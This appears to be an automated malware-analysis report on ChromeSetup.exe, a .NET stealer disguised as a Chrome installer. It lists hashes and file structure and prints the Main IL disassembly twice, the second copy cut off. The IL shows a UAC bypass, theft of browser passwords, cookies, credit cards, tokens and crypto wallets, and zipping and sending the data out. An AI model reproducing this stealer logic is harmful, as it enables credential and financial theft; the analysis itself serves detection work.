Suspicious
Suspect

802aa7a4a57b22e797ebeb2b3b638527

PE Executable
|
MD5: 802aa7a4a57b22e797ebeb2b3b638527
|
Size: 2.61 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
 Hash Value
MD5
802aa7a4a57b22e797ebeb2b3b638527
Sha1
6179f1929d3b2cdeb9d453ef1ec5ce3c88521923
Sha256
038da7941cb395df589983f3b09346694fe2a3a9e458a295ebfd5bd7c9fdb434
Sha384
b766225bf0cb6d7fab8f99f0787c75d75e38148218089c246240135c717c6ec73a70a5b55771395cd96a3d7707c348d8
Sha512
abf6d2065acf94e8e917e427838466613ab130c90a8334b8177be69d91c28705e1f46e66f017f275430dd8c1e573893017cd4eee08061f535ea6f46393472da1
SSDeep
49152:j7L+2upjBVhbAbXMtQl/wLz8r5S5l7KdVSZ4eY83TAcmi:/L+2upjBVGVl/lQrCSZ4183Dmi
TLSH
CAC5238537FC4909F6BF9B702CB6662486BDB8A35E25DB5E05C4309C1930BE5AD60F23

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
802aa7a4a57b22e797ebeb2b3b638527
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
costura.bouncycastle.cryptography.dll.compressed
costura.bouncycastle.cryptography.dll
[Authenticode]_31a7df4f.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.dll.compressed
costura.costura.dll
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
costura.costura.pdb.compressed
costura.costura.pdb
costura.metadata
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Administrator\AppData\Local\Temp\2\StubTemplate_3853\obj\Release\ChromeSetup.pdb
Module Name

ChromeSetup.exe
Full Name

ChromeSetup.exe
EntryPoint

System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Scope Name

ChromeSetup.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

ChromeSetup
Assembly Version

131.0.6778.140
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1127
Main Method

System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Main IL Instruction Count

440
Main IL

call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_0015: nop pop <null> leave.s IL_0015: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_0025: nop pop <null> leave.s IL_0025: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_0032: leave.s IL_003A leave IL_044C: ret leave.s IL_003A: nop pop <null> leave IL_044C: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_0045: ldc.i4.0 pop <null> leave.s IL_0045: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_0064: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_01FA: ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_01F0: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_01EA: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_00DB: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_013E: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0167: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_0154: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0128: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_0187: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0177: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0197: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01A7: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01D7: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01DB: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --passwords call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01D7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DB: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_006C: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_0215: ldc.i4.0 leave IL_044C: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_023E: leave.s IL_0243 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_0243: nop pop <null> leave.s IL_0243: nop nop <null> ldloc.1 <null> brfalse.s IL_0250: leave.s IL_0255 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_0255: nop pop <null> leave.s IL_0255: nop nop <null> ldloc.2 <null> brfalse.s IL_0262: leave.s IL_0267 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0267: nop pop <null> leave.s IL_0267: nop nop <null> ldloc.3 <null> brfalse.s IL_0274: leave.s IL_0279 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_0279: nop pop <null> leave.s IL_0279: nop nop <null> ldloc.s V_4 brfalse.s IL_0287: leave.s IL_028C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_028C: nop pop <null> leave.s IL_028C: nop nop <null> ldloc.0 <null> brfalse.s IL_0297: leave.s IL_029C ldloc.s V_6 call System.Void chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_029C: nop pop <null> leave.s IL_029C: nop nop <null> ldloc.1 <null> brfalse.s IL_02A7: leave.s IL_02AC ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02AC: nop pop <null> leave.s IL_02AC: nop nop <null> ldloc.2 <null> brfalse.s IL_02B7: leave.s IL_02BC ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02BC: nop pop <null> leave.s IL_02BC: nop nop <null> ldloc.3 <null> brfalse.s IL_02C7: leave.s IL_02CC ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02CC: nop pop <null> leave.s IL_02CC: nop nop <null> ldloc.s V_4 brfalse.s IL_02D8: leave.s IL_02DD ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_02DD: nop pop <null> leave.s IL_02DD: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_02E8: nop pop <null> leave.s IL_02E8: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_02F3: nop pop <null> leave.s IL_02F3: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_02FE: nop pop <null> leave.s IL_02FE: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0309: nop pop <null> leave.s IL_0309: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_0314: nop pop <null> leave.s IL_0314: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0340: leave.s IL_0345 ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0340: leave.s IL_0345 ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_0345: nop pop <null> leave.s IL_0345: nop nop <null> call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_036A: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_038E: call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03A7: nop pop <null> leave.s IL_03A7: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0417: leave.s IL_0421 ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0409: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0409: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0409: nop pop <null> leave.s IL_0409: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0417: leave.s IL_0421 pop <null> leave.s IL_0417: leave.s IL_0421 leave.s IL_0421: nop callvirt System.Exception System.Exception::get_InnerException() pop <null> leave.s IL_0421: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_0431: leave.s IL_044C pop <null> leave.s IL_0431: leave.s IL_044C leave.s IL_044C: ret pop <null> leave.s IL_044C: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_044B: endfinally pop <null> leave.s IL_044B: endfinally endfinally <null> ret <null>
Module Name

ChromeSetup.exe
Full Name

ChromeSetup.exe
EntryPoint

System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Scope Name

ChromeSetup.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

ChromeSetup
Assembly Version

131.0.6778.140
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1127
Main Method

System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Main IL Instruction Count

440
Main IL

call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_0015: nop pop <null> leave.s IL_0015: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_0025: nop pop <null> leave.s IL_0025: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_0032: leave.s IL_003A leave IL_044C: ret leave.s IL_003A: nop pop <null> leave IL_044C: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_0045: ldc.i4.0 pop <null> leave.s IL_0045: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_0064: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_01FA: ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_01F0: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_01EA: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_00DB: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_013E: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0167: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_0154: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0128: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_0187: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0177: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0197: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01A7: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01D7: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01DB: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --passwords call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01D7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DB: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_006C: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_0215: ldc.i4.0 leave IL_044C: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_023E: leave.s IL_0243 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_0243: nop pop <null> leave.s IL_0243: nop nop <null> ldloc.1 <null> brfalse.s IL_0250: leave.s IL_0255 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_0255: nop pop <null> leave.s IL_0255: nop nop <null> ldloc.2 <null> brfalse.s IL_0262: leave.s IL_0267 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0267: nop pop <null> leave.s IL_0267: nop nop <null> ldloc.3 <null> brfalse.s IL_0274: leave.s IL_0279 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_0279: nop pop <null> leave.s IL_0279: nop nop <null> ldloc.s V_4 brfalse.s IL_0287: leave.s IL_028C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_028C: nop pop <null> leave.s IL_028C: nop nop <null> ldloc.0 <null> brfalse.s IL_0297: leave.s IL_029C ldloc.s V_6 call System.Void chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_029C: nop pop <null> leave.s IL_029C: nop nop <null> ldloc.1 <null> brfalse.s IL_02A7: leave.s IL_02AC ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02AC: nop pop <null> leave.s IL_02AC: nop nop <null> ldloc.2 <null> brfalse.s IL_02B7: leave.s IL_02BC ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02BC: nop pop <null> leave.s IL_02BC: nop nop <null> ldloc.3 <null> brfalse.s IL_02C7: leave.s IL_02CC ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02CC: nop pop <null> leave.s IL_02CC: nop nop <null> ldloc.s V_4 brfalse.s IL_02D8: leave.s IL_02DD ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_02DD: nop pop <null> leave.s IL_02DD: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_02E8: nop pop <null> leave.s IL_02E8: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_02F3: nop pop <null> leave.s IL_02F3: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_02FE: nop pop <null> leave.s IL_02FE: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0309: nop pop <null> leave.s IL_0309: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_0314: nop pop <null> leave.s IL_0314: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0340: leave.s IL_0345 ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0340: leave.s IL_0345 ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_0345: nop pop <null> leave.s IL_0345: nop nop <null> call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_036A: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> 